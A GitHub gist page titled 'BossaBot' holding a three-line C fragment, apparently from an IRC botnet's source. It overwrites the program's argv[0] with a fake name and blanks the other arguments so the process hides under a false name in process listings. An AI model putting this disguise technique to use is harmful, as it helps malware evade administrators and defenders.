Skip to content

Instantly share code, notes, and snippets.

@revENGR
Created May 3, 2020 10:26
Show Gist options
  • Save revENGR/3e295de49da1305f0fd79e104ce130b6 to your computer and use it in GitHub Desktop.
Save revENGR/3e295de49da1305f0fd79e104ce130b6 to your computer and use it in GitHub Desktop.
BossaBot
#ifdef FAKENAME
strncpy(argv[0],FAKENAME,strlen(argv[0]));
for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment